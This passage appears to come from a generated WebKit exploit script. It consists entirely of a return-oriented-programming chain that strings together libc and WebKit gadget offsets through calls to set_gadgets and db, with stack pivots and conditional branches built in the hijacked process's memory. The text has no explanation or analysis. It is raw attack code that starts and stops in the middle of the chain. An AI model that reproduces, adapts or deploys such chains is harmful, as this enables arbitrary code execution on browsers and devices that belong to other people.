db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+244176, //L4430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4429:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4430:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4431:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+244280, //L4432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+244296, //L4433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4432:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4433:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+244472, //L4435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+244488, //L4436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+244456, //L4434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4434:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4435:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4436:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+244632, //L4439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+244648, //L4440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+244600, //L4437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4437:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4438:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4439:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4440:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+244720, //L4441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4441:
db([0, 0]); // 0x0
//L4413:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+244848, //L4444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+244864, //L4445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+244832, //L4443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4443:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4444:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4445:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+244976, //L4447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+245024, //L4450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+244992, //L4448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4447:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4448:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4449:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4450:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+245136, //L4451+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+245128, //L4451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4451:
db([0, 0]); // 0x0
set_gadgets([
ropchain+245152, //L4451+24
ropchain+247176, //L4446
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+245192, //L4452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4452:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4453:
db([120, 0]); // 0x78
set_gadget(libc_base+144605,); //pop rdi
//L4454:
db([120, 0]); // 0x78
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+245384, //L4458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+245352, //L4456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+245368, //L4457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4455:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4456:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4457:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4458:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+245440, //L4460
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4460:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+245568, //L4462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+245584, //L4463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+245552, //L4461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4461:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4462:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4463:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+245680, //L4465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+245664, //L4464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4464:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4465:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+245760, //L4466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4466:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4468:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+245880, //L4471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+245864, //L4469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4469:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4471:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+246024, //L4474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+245992, //L4472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+246008, //L4473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4472:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4473:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4474:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+246096, //L4476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4476:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+246152, //L4477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4477:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+246232, //L4479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4479:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4481:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+246352, //L4484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+246336, //L4482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4482:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4484:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+246496, //L4487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+246464, //L4485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+246480, //L4486
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4485:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4486:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4487:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+246584, //L4489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4488:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4489:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+246640, //L4490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4490:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4492:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+246720, //L4494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4494:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+246824, //L4495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+246840, //L4496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4495:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4496:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+246928, //L4498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4498:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+246984, //L4499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4499:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+247056, //L4502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4502:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+247112, //L4503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4503:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+258080, //L4505
//L4446:
libc_base+764760, //pop rsi
ropchain+247216, //L4506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4506:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4508:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+247336, //L4511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+247320, //L4509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4509:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4511:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+247512, //L4514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+247528, //L4515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+247480, //L4512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+247496, //L4513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4512:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4513:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4514:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4515:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+247688, //L4519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+247656, //L4517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+247672, //L4518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4516:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4517:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4518:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4519:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+247792, //L4521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+247776, //L4520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4520:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4521:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+247888, //L4523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4522:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4523:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4524:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+247992, //L4525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+248008, //L4526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4525:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4526:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+248176, //L4528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+248192, //L4529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+248160, //L4527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4527:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4528:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4529:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+248352, //L4534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+248368, //L4535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+248304, //L4531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4531:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4532:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4533:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4534:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4535:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+248480, //L4536+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+248472, //L4536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4536:
db([0, 0]); // 0x0
set_gadgets([
ropchain+248496, //L4536+24
ropchain+249536, //L4530
libc_base+764760, //pop rsi
ropchain+248536, //L4537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4537:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4539:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+248656, //L4542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+248640, //L4540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4540:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4542:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+248832, //L4545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+248848, //L4546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+248800, //L4543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+248816, //L4544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4543:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4544:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4545:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4546:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+248944, //L4548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+248928, //L4547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4547:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4548:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4549:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4550:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L4551:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+249144, //L4553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4553:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+249200, //L4554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4554:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+249336, //L4558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+249320, //L4557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4556:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4557:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4558:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+249424, //L4559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+249456, //L4561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4559:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4560:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4561:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+249528, //L4562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4562:
db([0, 0]); // 0x0
//L4530:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+249656, //L4565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+249672, //L4566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+249640, //L4564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4564:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4565:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4566:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+249832, //L4571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+249848, //L4572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+249784, //L4568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4568:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4569:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4570:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4571:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4572:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+249960, //L4573+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+249952, //L4573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4573:
db([0, 0]); // 0x0
set_gadgets([
ropchain+249976, //L4573+24
ropchain+250928, //L4567
libc_base+764760, //pop rsi
ropchain+250016, //L4574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4574:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4576:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+250136, //L4579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
